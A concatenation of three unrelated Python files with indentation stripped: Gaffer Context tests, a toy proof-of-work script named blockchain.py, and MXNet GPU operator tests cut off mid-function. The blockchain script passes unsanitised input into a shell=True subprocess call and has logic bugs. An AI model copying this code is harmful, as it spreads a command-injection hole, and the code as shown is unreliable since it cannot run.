# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( "\~" ), "~" )
self.assertEqual( c.substitute( "\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
self.assertTrue( c.hasSubstitutions( "\\" ) ) # must return true, because escaping affects substitution
self.assertTrue( c.hasSubstitutions( "\\\\" ) ) # must return true, because escaping affects substitution
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame" ] ) )
self.assertEqual( c["b"], "bear" )
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
if __name__ == "__main__":
unittest.main()
|
blockchain.py
|
import time
import hashlib
import subprocess
from threading import Thread
from queue import Queue
"""
import sys
import hashlib
def subbandthread(word, zeros, start, end):
for number in range(start, end):
hashBuffer = hashlib.sha3_512(bytes(word + "{}".format(number), "utf-8")).hexdigest()
if hashBuffer[:zeros] == zeros * "0": break
print(hashBuffer)
return "\nMatch : " + hashBuffer + "\nCheck : {}\n".format(number)
out = subbandthread(str(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]))
with open('result.txt', '+a') as result:
result.write(out)
"""
class BlockChain:
def __init__(self, word, zeros=3, threads=128, rangeOfBandes=1_000_000_000):
self.word = word
self.zeros = zeros
self.threads = threads
self.rangeOfBandes = rangeOfBandes
def router(self, thread, queue, word, zeros, log=True):
"""
Threads Make
"""
while True:
startband ,endband = queue.get()
if log: print("{0} Thread <{1}>".format(time.ctime(), thread))
band = queue.get()
ret = subprocess.call("python subbandthread.py {} {} {} {}".format(word, zeros, startband, endband),
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
queue.task_done()
@property
def run(self):
queue = Queue()
bandes = []
band = self.rangeOfBandes // self.threads
subband = self.rangeOfBandes // self.threads
for i in range(self.threads):
bandes.append((band-subband, band))
band += subband
for thread in range(self.threads):
subRange=bandes[thread]
worker = Thread(target=self.router, args=(thread, queue, self.word, self.zeros))
worker.setDaemon(True)
worker.start()
#print(bandes)
for band in bandes:
queue.put(band)
queue.join()
# Example
print(BlockChain("a", 4, 512).run)
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import test_create_csr, test_create_row_sparse, test_sparse_nd_slice
from test_sparse_ndarray import test_create_sparse_nd_empty, test_create_sparse_nd_from_sparse
from test_sparse_ndarray import test_create_sparse_nd_from_dense, test_create_sparse_nd_infer_shape
from test_sparse_ndarray import test_sparse_nd_check_format, test_sparse_nd_copy
from test_sparse_ndarray import test_sparse_nd_setitem, test_sparse_nd_binary_scalar_op
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm
del test_support_vector_machine_l2_svm
def check_countsketch(in_dim,out_dim,n):
sym = mx.sym.contrib.count_sketch(name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
# forward
exe_list = [sym.bind(mx.gpu(0), arr, arr_grad)]
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
assert_almost_equal(a,out1[0],rtol=1e-3, atol=1e-12)
# backward
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
for exe in exe_list:
exe.backward([out_grad])
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
assert_almost_equal(a,arr_grad[0].asnumpy(),rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_countsketch():
nrepeat = 2
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
for repeat in range(nrepeat):
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1,maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
#forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
@with_seed(0)
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list))
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
